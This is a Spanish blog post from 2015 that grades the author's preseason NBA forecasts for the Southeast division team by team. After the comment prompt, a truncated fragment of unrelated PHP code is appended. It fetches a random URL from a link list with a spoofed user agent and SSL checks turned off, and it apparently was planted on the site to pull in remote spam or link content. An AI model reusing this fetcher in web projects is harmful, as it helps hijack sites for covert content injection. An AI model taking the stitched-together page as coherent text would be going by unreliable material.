Revisando los pronósticos: Southeast

17 de February de 2015 por TheDeerHunter

Tras el All Star llega el momento de revisar la división más dura del Este, con 4 equipos actualmente en posiciones de Playoffs.

Atlanta Hawks

Pronóstico Octubre 2014: Por encima de las 40 victorias. Primera ronda.
Probabilidad de acierto: Parcialmente remota.
Calificación pronóstico: F+

Si la competición siempre fuera justa la probabilidad de acierto sería absolutamente nula y el análisis uno de los mayores fails de la historia del blog. Es más que probable que nos llevamos un zas en toda la boca, consecuencia de apostar contra el equipo de moda, cuyo nivel de juego ha sido comparado incluso con el de los exquisitos campeones vigentes. Cómo habrá sido la cosa que, acólitos como son a una filosofía que diluye el brillo individual, han logrado colocar a 4 hombres en el All Star Game, sin contar a Mike Budenholzer que además peleará el CoY en la edición más reñida que se recuerda. Baloncesto total, entre los mejores en ataque y defensa. Quién lo hubiera dicho. Tendrán que confirmar sus excelentes sensaciones en postemporada, donde por cierto siempre han sido un duro hueso y este curso podrían serlo aún más. Lo merecen. 

Washington Wizards

Pronóstico Octubre 2014: 49 victorias, entre los 4 primeros de conferencia y semifinales en Playoffs.
Probabilidad de acierto: Media.
Calificación pronóstico: B

Pronóstico relativamente prudente tras el relativo hype que se formó tras su pasada campaña y la offseason, aunque se adivinaba un tono optimista. La impresión es que tienen todo lo necesario para resultar un rival temible pero no terminan de arrancar, especialmente en ataque donde están muy lejos de ese top 4 del Este donde les encuadrábamos. John Wall se ha consagrado definitivamente como uno de los mejores bases de la competición pero en cambio a Bradley Beal se le ha visto algo estancado y el resto de una potente plantilla sobre el papel no logra encontrar el punto. Su balance contra equipos con balance ganador no invita al optimismo en una hipotética primera ronda ante un rival difícil. Es muy dudoso que logren clasificarse entre los 3 primeros y deberían rezar por no caer a la parte baja del cuadro.

Charlotte Hornets

Pronóstico Octubre 2014: Por encima de las 45 victorias. Primera ronda, pero tienen un techo superior si se dan algunas circunstancias favorables.
Calificación pronóstico: D
Probabilidad de acierto: Media-Baja.

Tras la pasada campaña y los movimientos este verano esperábamos mucho más de este equipo. Entre otros problemas los refuerzos no se han notado como tal y no ha existido la mejora ofensiva que se requería. La incorporación de Lance Stephenson no ha podido resultar más ruinosa, confirmándose como elemento disruptor de vestuarios. Resulta verdaderamente complicado devaluarse en tan corto espacio de tiempo hasta el punto de que tu franquicia estaría encantada de deshacerse de ti y no puede porque es imposible encontrarte destino. No debería extrañar un segundo caso Josh Smith a medio plazo visto el resultado. Por lo demás los Hornets siguen siendo uno de los equipos que mejor defienden y eso les permite resistir a mínimos en las postreras plazas de playoffs. Decíamos, sin embargo, que su techo llegado el caso podría ser más alto de la primera ronda y parece claro que nos equivocamos en ese punto. Mucho tienen que cambiar las cosas en el tramo final de la regular para creer que puedan dar la sorpresa en ninguna eliminatoria.

Miami Heat

Pronóstico Octubre 2014: Entre 45 y 47 victorias, quinta plaza de la Conferencia Este.
Probabilidad de acierto: Baja.
Calificación pronóstico: D

Nos pasamos unas 10 ó 15 victorias en nuestra previsión. Es difícil ponderar el factor psicológico que supone perder a un jugador de la talla de King James porque el potencial deportivo parecía haber resistido bastante bien el envite con la llega de Luol Deng, máxime habiendo descubierto al último gran milagro, Hassan Whiteside. Ni por esas. Los Heat han conservado alguna de sus virtudes (2º equipo que menos puntos encaja) pero también algunos de sus defectos (últimos en rebotes y la precariedad física de Dwyane Wade) y a los que ha añadido algún otro nuevo como unas carajas anotadoras de 2ª división B. Aguantan sobreviviendo precariamente en las últimas plazas de postemporada, al menos de momento. Triste situación para un equipo que hace menos de un año parecía casi imbatible e inmortal.

Orlando Magic

Pronóstico Octubre 2014: Entre 20 y 25 victorias, con Elfrid Payton luchando por el ROY.
Probabilidad de acierto: Media.
Calificación pronóstico: B+

Desde los tiempos de McMillan no existía en TJNBA una inquina semejante hacia ningún entrenador como la sufría Jacque Vaughn hasta el día de su merecido despido. Su etapa en Orlando ha ido claramente de más a menos tras un buen año inicial y, como pasa en algunos casos, la situación había terminado superándole del todo. Una total desconexión con la realidad de su plantilla. Por lo demás un análisis bastante atinado, mostrando además una visión preclara de los rookies, elegidos con polémica. No hemos podido disfrutar mucho de Aaron Gordon pero sí de Elfrid Payton. Si bien no llegará a luchar por el RoY sí pinta a mejor base novato del año. Competir hoy no es la guerra de estos chavales pero aún así tan pocas victorias no sientan bien. Habrá que armarse de paciencia.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>